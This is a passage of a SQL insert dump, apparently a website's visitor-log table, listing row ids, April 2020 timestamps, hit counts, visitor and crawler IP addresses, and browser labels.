,0,0,'66.249.64.23','chrome'),(500681,1587885852,1,1,0,0,'66.249.64.25','chrome'),(500682,1587885920,1,1,0,0,'207.46.13.63','other'),(500683,1587886140,1,1,0,0,'207.46.13.64','other'),(500684,1587886460,2,2,0,0,'66.249.64.24','chrome'),(500685,1587886823,1,1,0,0,'66.249.64.25','chrome'),(500686,1587887284,3,3,0,0,'207.46.13.63','other'),(500687,1587887317,1,1,0,0,'66.249.70.38','chrome'),(500688,1587887476,3,3,0,0,'157.55.39.206','other'),(500689,1587887986,2,2,0,0,'66.249.64.24','chrome'),(500690,1587888012,2,2,0,0,'207.46.13.180','other'),(500691,1587888354,1,1,0,0,'66.249.70.33','chrome'),(500692,1587888706,8,8,0,0,'77.120.98.235','other'),(500693,1587889597,1,1,0,0,'66.249.64.25','chrome'),(500694,1587889619,3,3,0,0,'66.249.64.23','chrome'),(500695,1587890469,1,1,0,0,'66.249.70.33','chrome'),(500696,1587890835,1,1,0,0,'66.249.70.36','chrome'),(500697,1587891186,1,1,0,0,'66.249.64.25','chrome'),(500698,1587891225,2,2,0,0,'66.249.64.24','chrome'),(500699,1587891706,1,1,0,0,'66.249.64.23','chrome'),(500700,1587892168,1,1,0,0,'66.249.70.36','chrome'),(500701,1587892571,1,1,0,0,'79.137.130.253','chrome'),(500702,1587892653,1,1,0,0,'188.163.76.94','firefox'),(500703,1587893252,1,1,0,0,'207.46.13.64','other'),(500704,1587893372,1,1,0,0,'66.249.70.38','chrome'),(500705,1587893405,3,3,0,0,'66.249.64.23','chrome'),(500706,1587893911,1,1,0,0,'157.55.39.206','other'),(500707,1587894683,1,1,0,0,'207.46.13.64','other'),(500708,1587894926,4,4,0,0,'66.249.64.24','chrome'),(500709,1587895535,1,1,0,0,'8.29.198.27','other'),(500710,1587895897,1,1,0,0,'8.29.198.25','other'),(500711,1587895949,1,1,0,0,'66.249.64.23','chrome'),(500712,1587896200,8,8,0,0,'77.120.98.235','other'),(500713,1587896327,1,0,1,0,'207.46.13.180',''),(500714,1587896544,1,0,1,0,'207.46.13.63',''),(500715,1587896616,2,1,1,0,'207.46.13.64',''),(500716,1587896701,2,2,0,0,'207.46.13.64','other'),(500717,1587896821,1,1,0,0,'207.46.13.180','other'),(500718,1587897175,1,1,0,0,'66.249.64.23','chrome'),(500719,1587897489,1,1,0,0,'66.249.64.24','chrome'),(500720,1587897699,1,1,0,0,'213.180.203.29','other'),(500721,1587898262,1,1,0,0,'66.249.70.36','chrome'),(500722,1587898512,4,4,0,0,'66.249.64.23','chrome'),(500723,1587898668,1,1,0,0,'178.154.200.222','other'),(500724,1587898670,2,1,1,0,'207.46.13.180',''),(500725,1587899099,1,1,0,0,'66.249.64.24','chrome'),(500726,1587899222,2,2,0,0,'66.249.64.25','chrome'),(500727,1587899685,1,1,0,0,'207.46.13.180','other'),(500728,1587899870,2,1,1,0,'157.55.39.206',''),(500729,1587899939,1,1,0,0,'178.154.200.97','other'),(500730,1587900164,1,1,0,0,'66.249.64.25','chrome'),(500731,1587901168,2,2,0,0,'66.249.64.25','chrome'),(500732,1587901188,1,1,0,0,'66.249.64.24','chrome'),(500733,1587901534,1,1,0,0,'207.46.13.180','other'),(500734,1587901852,1,1,0,0,'213.180.203.17','other'),(500735,1587901911,2,2,0,0,'207.46.13.64','other'),(500736,1587902887,1,1,0,0,'66.249.64.24','chrome'),(500737,1587903344,1,1,0,0,'109.74.154.72','chrome'),(500738,1587903567,2,2,0,0,'207.46.13.180','other'),(500739,1587903663,8,8,0,0,'77.120.98.235','other'),(500740,1587903996,1,1,0,0,'66.249.64.25','chrome'),(500741,1587904037,2,2,0,0,'178.154.200.222','other'),(500742,1587904039,2,2,0,0,'207.46.13.64','other'),(500743,1587904043,3,3,0,0,'157.55.39.206','other'),(500744,1587904690,1,1,0,0,'207.46.13.63','other'),(500745,1587905270,1,1,0,0,'178.154.200.220','other'),(500746,1587905296,3,3,0,0,'178.154.200.222','other'),(500747,1587906166,4,4,0,0,'66.249.64.24','chrome'),(500748,1587906203,1,1,0,0,'207.46.13.180','other'),(500749,1587906362,1,1,0,0,'8.29.198.26','other'),(500750,1587906668,1,1,0,0,'66.249.64.23','chrome'),(500751,1587906734,1,1,0,0,'8.29.198.27','other'),(500752,1587906956,1,1,0,0,'207.46.13.63','other'),(500753,1587907243,3,3,0,0,'178.154.200.222','other'),(500754,1587907260,1,1,0,0,'93.124.40.43','chrome'),(500755,1587907292,1,1,0,0,'207.46.13.64','other'),(500756,1587907893,1,1,0,0,'66.249.64.23','chrome'),(500757,1587907959,2,2,0,0,'213.180.203.16','other'),(500758,1587908154,1,1,0,0,'178.154.200.222','other'),(500759,1587908392,1,1,0,0,'35.243.23.6','chrome'),(500760,1587908394,1,1,0,0,'35.243.23.8','chrome'),(500761,1587908925,2,2,0,0,'157.55.39.206','other'),(500762,1587909007,2,2,0,0,'213.180.203.16','other'),(500763,1587909320,2,2,0,0,'207.46.13.180','other'),(500764,1587909389,2,2,0,0,'207.46.13.63','other'),(500765,1587909427,4,4,0,0,'178.154.200.222','other'),(500766,1587909435,2,2,0,0,'207.46.13.64','other'),(500767,1587909605,1,1,0,0,'178.154.200.236','other'),(500768,1587909936,2,2,0,0,'66.249.64.23','chrome'),(500769,1587910488,1,1,0,0,'207.46.13.63','other'),(500770,1587910506,2,2,0,0,'178.154.200.222','other'),(500771,1587910839,1,1,0,0,'66.249.70.36','chrome'),(500772,1587910862,2,2,0,0,'207.46.13.64','other'),(500773,1587911409,8,8,0,0,'77.120.98.235','other'),(500774,1587911482,1,1,0,0,'178.154.200.222','other'),(500775,1587911490,1,1,0,0,'207.46.13.180','other'),(500776,1587911556,1,1,0,0,'66.249.64.24','chrome'),(500777,1587911565,2,2,0,0,'213.180.203.16','other'),(500778,1587911982,1,1,0,0,'207.46.13.64','other'),(500779,1587912056,1,1,0,0,'66.249.64.25','chrome'),(500780,1587912068,1,1,0,0,'193.106.30.99','firefox'),(500781,1587912072,1,1,0,0,'207.46.13.63','other'),(500782,1587912182,1,1,0,0,'178.154.200.41','other'),(500783,1587912247,1,1,0,0,'213.180.203.60','other'),(500784,1587912509,3,3,0,0,'213.180.203.16','other'),(500785,1587912685,3,3,0,0,'66.249.64.23','chrome'),(500786,1587912867,1,1,0,0,'157.55.39.206','other'),(500787,1587912960,1,1,0,0,'66.249.64.25','chrome'),(500788,1587913062,1,1,0,0,'93.124.40.43','chrome'),(500789,1587913176,2,2,0,0,'207.46.13.63','other'),(500790,1587913197,1,1,0,0,'178.154.200.220','other'),(500791,1587913550,2,2,0,0,'213.180.203.16','other'),(500792,1587913648,3,3,0,0,'178.154.200.222','other'),(500793,1587914070,1,1,0,0,'207.46.13.180','other'),(500794,1587914115,1,1,0,0,'157.55.39.206','other'),(500795,1587914697,1,1,0,0,'131.220.6.152','chrome'),(500796,1587914907,3,3,0,0,'213.180.203.16','other'),(500797,1587914984,3,3,0,0,'178.154.200.222','other'),(500798,1587915554,1,1,0,0,'91.196.178.143','chrome'),(500799,1587915598,1,1,0,0,'178.133.102.199','chrome'),(500800,1587915917,1,1,0,0,'213.180.203.16','other'),(500801,1587916405,3,3,0,0,'178.154.200.222','other'),(500802,1587916935,2,2,0,0,'213.180.203.16','other'),(500803,1587917083,1,1,0,0,'66.249.64.25','chrome'),(500804,1587917189,1,1,0,0,'8.29.198.25','other'),(500805,1587917567,1,1,0,0,'8.29.198.27','other'),(500806,1587917574,1,1,0,0,'66.249.70.33','chrome'),(500807,1587918421,2,2,0,0,'66.249.64.24','chrome'),(500808,1587918458,1,1,0,0,'66.249.70.38','chrome'),(500809,1587918584,2,2,0,0,'178.154.200.222','other'),(500810,1587918965,1,1,0,0,'185.11.29.187','chrome'),(500811,1587919080,4,4,0,0,'178.154.200.220','other'),(500812,1587919106,8,8,0,0,'77.120.98.235','other'),(500813,1587919489,1,1,0,0,'66.249.70.38','chrome'),(500814,1587919578,3,3,0,0,'178.154.200.222','other'),(500815,1587919639,1,1,0,0,'213.180.203.16','other'),(500816,1587920634,1,1,0,0,'178.154.200.236','other'),(500817,1587920676,5,5,0,0,'178.154.200.222','other'),(500818,1587920679,1,1,0,0,'66.249.64.24','chrome'),(500819,1587921298,2,2,0,0,'213.180.203.16','other'),(500820,1587921322,1,1,0,0,'66.249.64.25','chrome'),(500821,1587921677,3,3,0,0,'178.154.200.222','other'),(500822,1587921712,1,1,0,0,'178.251.106.240','chrome'),(500823,1587922069,1,1,0,0,'173.252.111.15','other'),(500824,1587922071,1,1,0,0,'173.252.111.18','other'),(500825,1587922074,1,1,0,0,'173.252.111.16','other'),(500826,1587922075,1,1,0,0,'173.252.87.4','other'),(500827,1587923414,1,1,0,0,'178.154.200.97','other'),(500828,1587923563,1,1,0,0,'213.180.203.16','other'),(500829,1587923588,1,1,0,0,'66.249.70.33','chrome'),(500830,1587923828,2,2,0,0,'66.249.64.25','chrome'),(500831,1587923924,3,3,0,0,'178.154.200.222','other'),(500832,1587923969,1,1,0,0,'157.55.39.211','other'),(500833,1587924415,1,1,0,0,'173.252.95.21','other'),(500834,1587924537,1,1,0,0,'66.249.64.23','chrome'),(500835,1587924862,1,1,0,0,'178.154.200.220','other'),(500836,1587925011,1,1,0,0,'178.154.200.222','other'),(500837,1587925215,1,1,0,0,'207.46.13.174','other'),(500838,1587926029,1,1,0,0,'178.154.200.222','other'),(500839,1587926050,1,1,0,0,'157.55.39.211','other'),(500840,1587926622,2,2,0,0,'213.180.203.16','other'),(500841,1587926807,2,2,0,0,'157.55.39.206','other'),(500842,1587926899,8,8,0,0,'77.120.98.235','other'),(500843,1587927520,1,1,0,0,'93.74.137.111','chrome'),(500844,1587927552,3,3,0,0,'178.154.200.222','other'),(500845,1587928012,1,1,0,0,'8.29.198.25','other'),(500846,1587928028,1,1,0,0,'91.196.178.16','chrome'),(500847,1587928106,1,0,1,0,'66.249.64.23',''),(500848,1587928390,1,1,0,0,'8.29.198.26','other'),(500849,1587928427,2,2,0,0,'213.180.203.16','other'),(500850,1587928518,4,4,0,0,'178.154.200.222','other'),(500851,1587928974,3,3,0,0,'207.46.13.174','other'),(500852,1587929560,2,2,0,0,'178.154.200.222','other'),(500853,1587929738,1,1,0,0,'213.180.203.95','other'),(500854,1587930274,1,1,0,0,'178.154.200.196','other'),(500855,1587930358,1,1,0,0,'213.180.203.16','other'),(500856,1587930790,2,2,0,0,'178.154.200.222','other'),(500857,1587930818,1,1,0,0,'178.154.200.220','other'),(500858,1587930834,1,1,0,0,'178.154.200.97','other'),(500859,1587930932,1,1,0,0,'157.55.39.211','other'),(500860,1587931369,1,1,0,0,'31.13.103.5','other'),(500861,1587931378,1,1,0,0,'66.249.64.23','chrome'),(500862,1587931764,1,1,0,0,'92.38.136.69','chrome'),(500863,1587931953,2,2,0,0,'66.249.64.24','chrome'),(500864,1587932096,2,2,0,0,'157.55.39.211','other'),(500865,1587932240,2,2,0,0,'213.180.203.16','other'),(500866,1587932641,5,5,0,0,'178.154.200.222','other'),(500867,1587933730,1,1,0,0,'131.220.6.152','chrome'),(500868,1587934011,1,1,0,0,'178.154.200.220','other'),(500869,1587934034,2,2,0,0,'178.154.200.222','other'),(500870,1587934079,1,1,0,0,'207.46.13.174','other'),(500871,1587934461,2,2,0,0,'66.249.64.25','chrome'),(500872,1587934578,1,1,0,0,'13.66.139.0','other'),(500873,1587934620,1,1,0,0,'178.154.200.87','other'),(500874,1587934647,5,5,0,0,'213.180.203.16','other'),(500875,1587935170,8,8,0,0,'77.120.98.235','other'),(500876,1587935692,3,3,0,0,'178.154.200.222','other'),(500877,1587935696,1,1,0,0,'213.180.203.70','other'),(500878,1587936365,1,1,0,0,'178.154.200.97','other'),(500879,1587936676,1,1,0,0,'213.180.203.142','other'),(500880,1587937187,1,1,0,0,'178.154.200.222','other'),(500881,1587937887,2,2,0,0,'213.180.203.16','other'),(500882,1587938496,1,1,0,0,'178.154.200.222','other'),(500883,1587938831,1,1,0,0,'8.29.198.25','other'),(500884,1587939217,1,1,0,0,'8.29.198.27','other'),(500885,1587939664,1,0,1,0,'157.55.39.206',''),(500886,1587939772,1,1,0,0,'213.180.203.16','other'),(500887,1587939790,1,1,0,0,'207.46.13.174','other'),(500888,1587940134,4,4,0,0,'178.154.200.222','other'),(500889,1587940661,1,1,0,0,'66.249.64.25','chrome'),(500890,1587940715,3,3,0,0,'213.180.203.16','other'),(500891,1587941226,2,2,0,0,'178.154.200.222','other'),(500892,1587942184,6,6,0,0,'178.154.200.222','other'),(500893,1587942582,1,1,0,0,'213.180.203.16','other'),(500894,1587943027,1,1,0,0,'178.154.200.97','other'),(500895,1587943196,1,0,1,0,'157.55.39.206',''),(500896,1587943208,8,8,0,0,'77.120.98.235','other'),(500897,1587943295,5,5,0,0,'178.154.200.222','other'),(500898,1587943388,1,1,0,0,'178.154.200.196','other'),(500899,1587943422,1,1,0,0,'178.154.200.220','other'),(500900,1587943580,3,3,0,0,'213.180.203.16','other'),(500901,1587944560,5,5,0,0,'213.180.203.16','other'),(500902,1587944639,3,3,0,0,'178.154.200.222','other'),(500903,1587945307,1,1,0,0,'62.205.134.182','other'),(500904,1587945618,1,1,0,0,'66.249.64.24','chrome'),(500905,1587945672,5,5,0,0,'178.154.200.222','other'),(500906,1587945688,2,2,0,0,'66.249.64.25','chrome'),(500907,1587946066,2,2,0,0,'213.180.203.16','other'),(500908,1587946787,5,5,0,0,'178.154.200.222','other'),(500909,1587947278,1,1,0,0,'178.154.200.220','other'),(500910,1587947868,48,48,0,0,'5.189.141.124','other'),(500911,1587947946,4,4,0,0,'213.180.203.16','other'),(500912,1587948182,3,3,0,0,'178.154.200.222','other'),(500913,1587948770,44,44,0,0,'5.189.141.124','other'),(500914,1587949037,2,2,0,0,'213.180.203.16','other'),(500915,1587949128,2,2,0,0,'178.154.200.222','other'),(500916,1587949661,1,1,0,0,'8.29.198.25','other'),(500917,1587949714,1,1,0,0,'178.154.200.220','other'),(500918,1587949793,1,1,0,0,'66.249.64.25','chrome'),(500919,1587950048,1,1,0,0,'8.29.198.26','other'),(500920,1587950170,4,4,0,0,'213.180.203.16','other'),(500921,1587950478,4,4,0,0,'178.154.200.222','other'),(500922,1587951482,2,2,0,0,'178.154.200.222','other'),(500923,1587951653,8,8,0,0,'77.120.98.235','other'),(500924,1587951657,1,1,0,0,'213.180.203.16','other'),(500925,1587952397,1,1,0,0,'66.249.64.24','chrome'),(500926,1587952635,1,1,0,0,'213.180.203.17','other'),(500927,1587952675,2,2,0,0,'178.154.200.222','other'),(500928,1587952771,1,1,0,0,'178.154.200.196','other'),(500929,1587952869,3,3,0,0,'213.180.203.16','other'),(500930,1587953488,1,1,0,0,'66.249.64.23','chrome'),(500931,1587953788,4,4,0,0,'178.154.200.222','other'),(500932,1587955361,1,0,1,0,'157.55.39.206',''),(500933,1587955494,4,4,0,0,'178.154.200.222','other'),(500934,1587955740,2,2,0,0,'213.180.203.16','other'),(500935,1587956223,2,2,0,0,'162.241.65.44','other'),(500936,1587956584,2,2,0,0,'178.154.200.222','other'),(500937,1587957660,6,6,0,0,'178.154.200.222','other'),(500938,1587957819,1,1,0,0,'66.249.64.23','chrome'),(500939,1587957911,1,1,0,0,'178.154.200.236','other'),(500940,1587958061,1,1,0,0,'178.154.200.92','other'),(500941,1587958161,1,1,0,0,'157.55.39.206','other'),(500942,1587959217,3,3,0,0,'178.154.200.222','other'),(500943,1587959554,8,8,0,0,'77.120.98.235','other'),(500944,1587960293,1,1,0,0,'178.154.200.92','other'),(500945,1587960486,1,1,0,0,'8.29.198.25','other'),(500946,1587960541,1,1,0,0,'178.154.200.216','other'),(500947,1587960876,1,1,0,0,'8.29.198.27','other'),(500948,1587961145,1,1,0,0,'31.13.115.5','other'),(500949,1587961146,1,1,0,0,'31.13.115.22','other'),(500950,1587961296,1,1,0,0,'213.180.203.140','other'),(500951,1587961322,1,1,0,0,'213.180.203.90','other'),(500953,1587961779,1,1,0,0,'31.13.115.7','other'),(500954,1587961970,1,1,0,0,'178.154.200.119','other'),(500955,1587962381,1,1,0,0,'213.180.203.70','other'),(500956,1587962400,1,0,1,0,'157.55.39.206',''),(500957,1587962588,1,1,0,0,'62.205.134.182','other'),(500958,1587962852,1,1,0,0,'213.180.203.16','other'),(500959,1587963051,6,6,0,0,'178.154.200.222','other'),(500960,1587963508,1,1,0,0,'178.154.200.220','other'),(500961,1587963637,1,1,0,0,'31.13.115.15','other'),(500962,1587963638,1,1,0,0,'31.13.115.2','other'),(500963,1587963802,2,1,1,0,'157.55.39.206',''),(500964,1587963904,1,1,0,0,'66.249.64.25','chrome'),(500965,1587965045,1,1,0,0,'66.249.64.24','chrome'),(500966,1587965148,1,1,0,0,'213.180.203.16','other'),(500967,1587965516,1,1,0,0,'178.154.200.92','other'),(500968,1587965573,1,1,0,0,'213.180.203.122','other'),(500969,1587965811,1,1,0,0,'91.124.247.141','chrome'),(500970,1587966138,1,1,0,0,'213.180.203.17','other'),(500971,1587966403,1,1,0,0,'213.180.203.16','other'),(500972,1587966619,5,5,0,0,'178.154.200.222','other'),(500973,1587966909,1,1,0,0,'178.154.200.196','other'),(500974,1587967087,1,1,0,0,'157.55.39.206','other'),(500975,1587968286,1,1,0,0,'157.55.39.206','other'),(500976,1587968300,2,2,0,0,'66.249.64.25','chrome'),(500977,1587968392,8,8,0,0,'77.120.98.235','other'),(500978,1587968745,3,3,0,0,'178.154.200.222','other'),(500979,1587968983,1,1,0,0,'178.154.200.102','other'),(500980,1587969522,1,1,0,0,'178.154.200.92','other'),(500981,1587969665,5,5,0,0,'178.154.200.222','other'),(500982,1587970119,1,1,0,0,'66.249.64.24','chrome'),(500983,1587970570,5,5,0,0,'178.154.200.222','other'),(500984,1587970904,1,1,0,0,'66.249.64.25','chrome'),(500985,1587971306,1,1,0,0,'46.211.9.92','chrome'),(500986,1587971308,2,2,0,0,'8.29.198.26','other'),(500987,1587971632,1,1,0,0,'66.249.70.36','chrome'),(500988,1587971782,1,1,0,0,'66.68.99.212','other'),(500989,1587971829,7,7,0,0,'178.154.200.222','other'),(500990,1587972078,2,2,0,0,'66.249.64.24','chrome'),(500991,1587972164,1,1,0,0,'178.154.200.236','other'),(500992,1587972528,3,3,0,0,'213.180.203.16','other'),(500993,1587972605,1,1,0,0,'37.73.19.127','chrome'),(500994,1587972964,1,1,0,0,'91.196.178.82','firefox'),(500995,1587973179,1,1,0,0,'95.47.150.96','chrome'),(500996,1587973491,2,2,0,0,'157.55.39.206','other'),(500997,1587973611,3,3,0,0,'178.154.200.222','other'),(500998,1587973665,1,1,0,0,'178.154.200.220','other'),(500999,1587973710,1,1,0,0,'66.249.64.25','chrome'),(501000,1587974046,1,1,0,0,'213.180.203.16','other'),(501001,1587974734,3,3,0,0,'178.154.200.222','other'),(501002,1587975004,1,1,0,0,'213.180.203.16','other'),(501003,1587975556,1,1,0,0,'185.255.135.44','firefox'),(501004,1587975690,6,6,0,0,'178.154.200.222','other'),(501005,1587976114,8,8,0,0,'77.120.98.235','other'),(501006,1587976604,3,3,0,0,'178.154.200.222','other'),(501007,1587976635,1,1,0,0,'157.55.39.206','other'),(501008,1587976731,1,1,0,0,'92.112.125.84','chrome'),(501009,1587976903,1,1,0,0,'213.180.203.16','other'),(501010,1587977449,1,1,0,0,'66.249.64.25','chrome'),(501011,1587977915,5,5,0,0,'178.154.200.222','other'),(501012,1587977986,1,1,0,0,'213.180.203.16','other'),(501013,1587978564,2,2,0,0,'66.249.64.23','chrome'),(501014,1587978677,1,1,0,0,'66.249.64.24','chrome'),(501015,1587978831,1,1,0,0,'178.154.200.222','other'),(501016,1587979732,1,1,0,0,'213.180.203.16','other'),(501017,1587979760,2,2,0,0,'178.154.200.222','other'),(501018,1587980755,4,4,0,0,'178.154.200.222','other'),(501019,1587981415,1,1,0,0,'91.196.178.71','firefox'),(501020,1587981510,1,1,0,0,'3.133.121.124','chrome'),(501021,1587981687,2,2,0,0,'213.180.203.16','other'),(501022,1587982131,3,3,0,0,'178.154.200.222','other'),(501023,1587982134,1,1,0,0,'8.29.198.25','other'),(501024,1587982414,1,1,0,0,'157.55.39.206','other'),(501025,1587982418,1,1,0,0,'213.180.203.17','other'),(501026,1587982547,1,1,0,0,'8.29.198.27','other'),(501027,1587983172,4,4,0,0,'178.154.200.222','other'),(501028,1587983754,1,1,0,0,'66.249.64.25','chrome'),(501029,1587983800,1,1,0,0,'178.154.200.97','other'),(501030,1587984045,1,1,0,0,'213.180.203.16','other'),(501031,1587984158,8,8,0,0,'77.120.98.235','other'),(501032,1587984217,4,4,0,0,'178.154.200.222','other'),(501033,1587984962,1,1,0,0,'157.55.39.206','other'),(501034,1587985642,2,2,0,0,'178.154.200.222','other'),(501035,1587985647,1,1,0,0,'173.252.111.20','other'),(501036,1587986081,2,2,0,0,'213.180.203.16','other'),(501037,1587986673,1,1,0,0,'66.249.64.24','chrome'),(501038,1587986994,1,1,0,0,'66.249.70.33','chrome'),(501039,1587987195,1,1,0,0,'109.74.154.72','chrome'),(501040,1587989155,3,3,0,0,'157.55.39.206','other'),(501041,1587989449,2,2,0,0,'207.46.13.219','other'),(501042,1587989730,1,1,0,0,'193.106.30.99','firefox'),(501043,1587990034,1,1,0,0,'131.220.6.152','chrome'),(501044,1587990359,1,1,0,0,'178.154.200.87','other'),(501045,1587990783,1,1,0,0,'91.196.178.189','firefox'),(501046,1587991639,1,1,0,0,'178.154.200.222','other'),(501047,1587991696,1,0,1,0,'66.249.64.25',''),(501048,1587991777,1,1,0,0,'207.46.13.219','other'),(501049,1587992042,1,1,0,0,'66.249.64.24','chrome'),(501050,1587992464,8,8,0,0,'77.120.98.235','other'),(501051,1587992962,1,1,0,0,'8.29.198.26','other'),(501052,1587993312,1,0,1,0,'157.55.39.206',''),(501053,1587993384,1,1,0,0,'8.29.198.25','other'),(501054,1587993750,2,2,0,0,'207.46.13.174','other'),(501055,1587995166,1,1,0,0,'213.180.203.16','other'),(501056,1587995546,1,1,0,0,'157.55.39.206','other'),(501057,1587996273,1,1,0,0,'66.249.70.33','chrome'),(501058,1587996399,1,1,0,0,'91.196.178.144','chrome'),(501059,1587997490,1,1,0,0,'46.39.4.246','chrome'),(501060,1587997496,1,1,0,0,'109.167.156.88','chrome'),(501061,1587997979,1,1,0,0,'157.55.39.206','other'),(501062,1587999941,1,1,0,0,'207.46.13.174','other'),(501063,1588000170,1,1,0,0,'66.249.64.25','chrome'),(501064,1588000243,8,8,0,0,'77.120.98.235','other'),(501065,1588000714,1,1,0,0,'94.153.0.104','chrome'),(501066,1588001753,1,1,0,0,'207.46.13.219','other'),(501067,1588002052,1,1,0,0,'157.55.39.206','other'),(501068,1588002322,1,1,0,0,'207.46.13.174','other'),(501069,1588002693,2,2,0,0,'213.180.203.16','other'),(501070,1588003132,1,1,0,0,'157.55.39.206','other'),(501071,1588003380,1,1,0,0,'207.46.13.219','other'),(501072,1588003787,2,2,0,0,'8.29.198.25','other'),(501073,1588003926,1,1,0,0,'178.154.200.220','other'),(501074,1588004588,1,1,0,0,'178.154.200.92','other'),(501075,1588004939,1,1,0,0,'178.154.200.222','other'),(501076,1588005176,1,0,1,0,'207.46.13.174',''),(501077,1588005338,1,1,0,0,'91.196.178.137','firefox'),(501078,1588005725,1,1,0,0,'157.55.39.206','other'),(501079,1588005848,2,2,0,0,'207.46.13.219','other'),(501080,1588005852,2,2,0,0,'207.46.13.174','other'),(501081,1588006027,2,2,0,0,'213.180.203.16','other'),(501082,1588006051,1,1,0,0,'66.249.64.23','chrome'),(501083,1588006123,2,2,0,0,'178.154.200.222','other'),(501084,1588007123,1,1,0,0,'176.119.28.196','other'),(501085,1588007426,2,2,0,0,'213.180.203.16','other'),(501086,1588007444,1,1,0,0,'178.154.200.222','other'),(501087,1588007797,8,8,0,0,'77.120.98.235','other'),(501088,1588008483,2,2,0,0,'213.180.203.16','other'),(501089,1588008495,1,1,0,0,'178.154.200.222','other'),(501090,1588009313,1,1,0,0,'157.55.39.206','other'),(501091,1588009664,1,1,0,0,'66.249.64.25','chrome'),(501092,1588009776,1,1,0,0,'167.71.186.141','other'),(501093,1588009943,1,1,0,0,'178.154.200.222','other'),(501094,1588009985,1,1,0,0,'178.154.200.216','other'),(501095,1588010026,1,1,0,0,'207.46.13.174','other'),(501096,1588011167,1,1,0,0,'66.249.64.25','chrome'),(501097,1588011178,1,0,1,0,'207.46.13.174',''),(501098,1588011409,1,1,0,0,'178.154.200.110','other'),(501099,1588011793,2,2,0,0,'178.154.200.222','other'),(501100,1588012148,2,2,0,0,'213.180.203.16','other'),(501101,1588012337,1,1,0,0,'91.196.178.116','chrome'),(501102,1588012799,2,2,0,0,'178.154.200.222','other'),(501103,1588013034,1,1,0,0,'207.46.13.174','other'),(501104,1588013313,1,0,1,0,'157.55.39.206',''),(501105,1588013502,1,1,0,0,'213.180.203.17','other'),(501106,1588013986,1,1,0,0,'213.180.203.16','other'),(501107,1588014612,1,1,0,0,'8.29.198.26','other'),(501108,1588015043,1,1,0,0,'8.29.198.27','other'),(501109,1588015280,2,2,0,0,'207.46.13.219','other'),(501110,1588015321,1,1,0,0,'66.249.64.24','chrome'),(501111,1588015449,1,1,0,0,'207.46.13.174','other'),(501112,1588015472,8,8,0,0,'77.120.98.235','other'),(501113,1588015570,1,1,0,0,'213.180.203.16','other'),(501114,1588016093,1,1,0,0,'66.249.64.25','chrome'),(501115,1588016202,2,1,1,0,'207.46.13.219',''),(501116,1588016721,1,1,0,0,'213.180.203.16','other'),(501117,1588016734,1,1,0,0,'178.154.200.220','other'),(501118,1588017068,1,1,0,0,'178.154.200.222','other'),(501119,1588017622,1,1,0,0,'207.46.13.219','other'),(501120,1588017743,1,1,0,0,'66.249.64.25','chrome'),(501121,1588017850,1,0,1,0,'207.46.13.174',''),(501122,1588018932,1,1,0,0,'209.17.97.2','other'),(501123,1588019591,2,2,0,0,'95.213.141.126','opera'),(501124,1588019601,1,1,0,0,'178.154.200.216','other'),(501125,1588019607,1,1,0,0,'207.46.13.174','other'),(501126,1588019906,2,2,0,0,'213.180.203.16','other'),(501127,1588020155,1,1,0,0,'157.55.39.206','other'),(501128,1588020445,2,2,0,0,'178.154.200.220','other'),(501129,1588020510,2,2,0,0,'178.154.200.222','other'),(501130,1588021470,1,1,0,0,'66.249.64.24','chrome'),(501131,1588021712,1,1,0,0,'178.154.200.220','other'),(501132,1588023009,1,1,0,0,'207.46.13.174','other'),(501133,1588023077,8,8,0,0,'77.120.98.235','other'),(501134,1588023146,1,1,0,0,'157.55.39.206','other'),(501135,1588024270,1,1,0,0,'213.180.203.17','other'),(501136,1588024291,1,1,0,0,'213.180.203.95','other'),(501137,1588024534,1,1,0,0,'213.180.203.148','other'),(501138,1588024829,1,1,0,0,'207.46.13.174','other'),(501139,1588024924,1,1,0,0,'178.154.200.112','other'),(501140,1588025440,1,1,0,0,'8.29.198.26','other'),(501141,1588025755,1,0,1,0,'207.46.13.174',''),(501142,1588025868,1,1,0,0,'8.29.198.27','other'),(501143,1588026185,2,2,0,0,'178.154.200.176','other'),(501144,1588026715,1,1,0,0,'213.180.203.140','other'),(501145,1588026721,1,1,0,0,'213.180.203.65','other'),(501146,1588027933,1,1,0,0,'207.46.13.174','other'),(501147,1588028186,1,1,0,0,'213.180.203.142','other'),(501148,1588028201,1,1,0,0,'178.154.200.106','other'),(501149,1588028511,1,1,0,0,'157.55.39.206','other'),(501150,1588028864,1,0,1,0,'207.46.13.219',''),(501151,1588029223,1,1,0,0,'212.92.121.77','firefox'),(501152,1588029427,1,1,0,0,'213.180.203.140','other'),(501153,1588029646,1,1,0,0,'178.154.200.222','other'),(501154,1588029756,1,1,0,0,'213.180.203.16','other'),(501155,1588030192,1,1,0,0,'178.154.200.97','other'),(501156,1588030297,1,1,0,0,'213.180.203.95','other'),(501157,1588030984,1,1,0,0,'213.180.203.90','other'),(501158,1588031026,8,8,0,0,'77.120.98.235','other'),(501159,1588031146,1,0,1,0,'157.55.39.206',''),(501160,1588031322,1,1,0,0,'178.154.200.119','other'),(501161,1588031467,2,2,0,0,'178.154.200.222','other'),(501162,1588031706,1,1,0,0,'62.205.134.182','other'),(501163,1588032531,1,1,0,0,'178.154.200.196','other'),(501164,1588032934,4,4,0,0,'178.154.200.222','other'),(501165,1588033148,1,1,0,0,'213.180.203.95','other'),(501166,1588033848,1,0,1,0,'157.55.39.206',''),(501167,1588034183,1,1,0,0,'178.154.200.222','other'),(501168,1588034980,1,0,1,0,'207.46.13.219',''),(501169,1588035579,1,1,0,0,'207.46.13.219','other'),(501170,1588035731,1,1,0,0,'178.154.200.220','other'),(501171,1588036270,2,2,0,0,'8.29.198.25','other'),(501172,1588036431,1,1,0,0,'178.154.200.222','other'),(501173,1588036790,1,1,0,0,'178.154.200.155','other'),(501174,1588036878,2,1,1,0,'207.46.13.219',''),(501175,1588037189,1,1,0,0,'213.180.203.16','other'),(501176,1588037334,1,1,0,0,'207.46.13.174','other'),(501177,1588038188,1,1,0,0,'207.46.13.116','other'),(501178,1588038460,1,1,0,0,'157.55.39.206','other'),(501179,1588038499,8,8,0,0,'77.120.98.235','other'),(501180,1588039119,1,1,0,0,'207.46.13.219','other'),(501181,1588039236,1,1,0,0,'213.180.203.90','other'),(501182,1588039240,1,1,0,0,'178.154.200.196','other'),(501183,1588039514,1,1,0,0,'213.180.203.190','other'),(501184,1588040116,1,1,0,0,'66.249.64.23','chrome'),(501185,1588040377,1,1,0,0,'209.17.96.26','other'),(501186,1588040604,2,2,0,0,'213.180.203.109','other'),(501187,1588041267,1,1,0,0,'207.46.13.116','other'),(501188,1588041773,1,1,0,0,'178.154.200.106','other'),(501189,1588041985,1,1,0,0,'178.154.200.67','other'),(501190,1588042130,1,1,0,0,'213.180.203.29','other'),(50119